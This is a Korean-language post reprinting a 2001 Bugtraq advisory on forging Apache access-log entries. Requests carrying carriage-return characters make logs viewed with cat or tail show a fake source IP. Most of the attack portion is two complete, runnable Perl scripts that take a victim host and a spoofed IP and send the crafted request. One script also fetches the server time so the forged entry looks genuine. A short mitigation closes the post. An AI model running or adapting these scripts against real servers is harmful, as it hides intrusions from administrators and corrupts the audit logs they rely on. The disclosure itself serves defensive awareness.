아파치 로그 정보 속이기
아래의 코드를 적당한 파일로 생성하여 (이를테면 fake.cgi)
./fake.cgi target.co.kr 80 /index.html 1.1.1.1
와 같이 실행하면 해당 웹서버의 index.html 을 읽으면서 target.co.kr 의 웹
서버에 남는
로그정보는 아래와 같게 됩니다.
1.1.1.1 – – “GET / HTTP/1.0” 200 1333 +0900] “GET //index.html HTTP/1.0”
즉, 소스가 1.1.1.1이 아닌 다른 곳에서 target.co.kr 서버의 80 번으로
접속시도를 했는데,
소스IP 는 fake 된 1.1.1.1 이 되는 것입니다..
정상적인 로그 정보는
211.xx.xx.xxx – – [25/Oct/2001:20:26:17 +0900] “GET //index.html HTTP/1.0”
와 같아야 합니다…
위의 실험으로 보아 웹서버의 로그 정보도 충분히 속일 수 있다는 것을 알 수
있습니다.
IIS에서는 적용이 되지 않더군요….
원문은 아래 사이트를 참고하시기 바랍니다.
http://www.securityfocus.com/archive/1/222666
그럼…..
참고로, 아래 소스에서는 원본 소스의 get_time(); 부분을 뺐습니다.
#!/usr/bin/perl
use Socket;
use strict;
my $data_sacada;
######get the values
my $host = $ARGV[0];
my $port = $ARGV[1];
my $target = inet_aton($host);
my $file_to_get= $ARGV[2];
my $fake_ip = $ARGV[3];
######prepare request
my $envia=”GET /$file_to_get HTTP/1.0 \\r$fake_ip – – $data_sacada \\”GET /
HTTP/1.0\\r\\n\\r\\n”;
my @resultados=sendraw($envia);
print @resultados;
sub sendraw { # this saves the whole transaction anyway
my %args;
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname(‘tcp’)||0) ||
die(“Socket problems\\n”);
if(connect(S,pack “SnA4x8”,2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;
print STDOUT “.” if(defined $args{X});}
select(STDOUT); close(S); return @in;
} else { die(“Can’t connect…\\n”); }
}
————————————
보낸 사람 : “smiler” <smiler at vxd.org>
받는 사람 : <bugtraq at securityfocus.com>,
<submissions at
packetstormsecurity.org>
제목 : Hidden requests to Apache
보낸 날짜 : Wed, 24 Oct 2001 21:09:59 +0100
———-Intro———-
Hi all ! Thanx to war at genhex.org and zav at genhex.org for discussing this
issue and helping on getting ideas about this issue with their imagination
!! 🙂
Don큧 know if this has been brought before.
It큦 possible to “cheat” a Apache SysAdministrator and make him think that
his server didn큧 log a HTTP request or make him think that a request has
been made by another Ip address.
This “cheating” is only valid when the log is displayed on the screen using
common unix utils as cat, tail, grep, etc…
This will not work with the kind of sysadmin that edit the logs using vi or
even print them to read at night on bed eh eh 🙂
I am not sure if this can be considered as a bug or as a feature (?) but in
any case it will surely lead apache sysadmins into mistake !!
———-Technique———-
To make a request and to make it seem like it came from NO IP ADDRESS at
all, the request should be made as this :
GET / HTTP/1.0 \\r\\r\\n
In this case APACHE will print in the log file the carriage return
character. So when we try to tail the access_log file it will be shown in
the screen as :
” 414 3461.251 – – [24/Oct/2001:18:58:18 +0100] “GET / HTTP/1.0
A normal line would be :
127.0.0.1 – – [24/Oct/2001:19:00:32 +0100] “GET / HTTP/1.0” 200 164
The normal line output will help us to understand that what happens is cat
made a carriage return after the HTTP/1.0 and printed the rest of the log
over the Ip Address field.
We can also make it look like the request came from another Ip address, and
this is preferable because like this the SysAdmin will see no apparent
strange behaviour in the logfile. Just be carefull with the timestamp !!
So the request should be :
GET / HTTP/1.0 \\r10.0.0.1 – – [24/Oct/2001:19:00:32 +0100] “GET /
HTTP/1.0\\r\\n
And the logfile will appear like this :
10.0.0.1 – – [24/Oct/2001:19:00:32 +0100] “GET / HTTP/1.0” 200 164
This is a perfect log entry and nobody can suspect on it 🙂
———-The Warez———-
#!/usr/bin/perl
#
# smiler at vxd.org war at genhex.org zav at genhex.org
# \\x18/\\xa/\\x07d1 ++351 Rulez
#
# This script will make a “hidden” request to a Apache Server when the log
file is viewed using cat grep tail …
# The script sends a carriage return character after the HTTP/1.0 and then
it makes a fake entry with the IP supplied in argv
# and it inserts a time-stamp similar to the one that server is using
currently, we get this by making a get request to the
# server before our special *g* GET, though we can큧 control the time
zone
of the server. So the time-zone may
# vary. Tested in ALL apache versions.
###############################################################
#############
#######################################################
# Thoughts : It would be better to send escape characters with move_forward
codes after the \\r and move over the real
# server큦 time stamp !! Anyone ? How do log analyzers deal with this stuff
? Anyone ?
###############################################################
#############
#######################################################
use Socket;
use strict;
my $data_sacada;
######check argv
if ($#ARGV != 3) {
print qq~
Geee it큦 running !! kewl :)))
Usage : ./apache_log.pl <VICTIM_HOST> <PORT> <FILE_TO_GET> <FAKE_IP>
Example Usage : apache_log.pl victimsite.victimsite.biz 80 /index.html
255.255.255.255
~; exit;}
######get the values
my $host = $ARGV[0];
my $port = $ARGV[1];
my $target = inet_aton($host);
my $file_to_get= $ARGV[2];
my $fake_ip = $ARGV[3];
get_time();
######prepare request
my $envia=”GET /$file_to_get HTTP/1.0 \\r$fake_ip – – $data_sacada \\”GET /
HTTP/1.0\\r\\n\\r\\n”;
my @resultados=sendraw($envia);
print @resultados;
###### Sendraw – thanks RFP rfp at wiretrip.net ######
sub sendraw { # this saves the whole transaction anyway
my %args;
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname(‘tcp’)||0) ||
die(“Socket problems\\n”);
if(connect(S,pack “SnA4x8”,2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;
print STDOUT “.” if(defined $args{X});}
select(STDOUT); close(S); return @in;
} else { die(“Can’t connect…\\n”); }
}
###### Get the server time b4 sending the hidden request ######
sub get_time {
my $req=”GET / HTTP/1.0\\n\\n”;
my $data;
my @res=sendraw($req);
my $wday;
my $day;
my $mon;
my $year;
my $hour;
my $tz;
my $line;
foreach $line (@res) {
if ($line =~ /Date/) {
$data = $line;
$data =~ s/Date: //g;
($wday,$day,$mon,$year,$hour,$tz)=split(/ /,$data);
$data_sacada=”[“.$day.”/”.$mon.”/”.$year.”:”.$hour.”
+0000]”;
}
}
}
———-Solution———-
Use ‘vi’ to check your logs or cat your log using :
perl -e ‘open(FH,”access_log”);while(<FH>){$_=~s/[\\r|\\b|\\x27]//g;print $_}’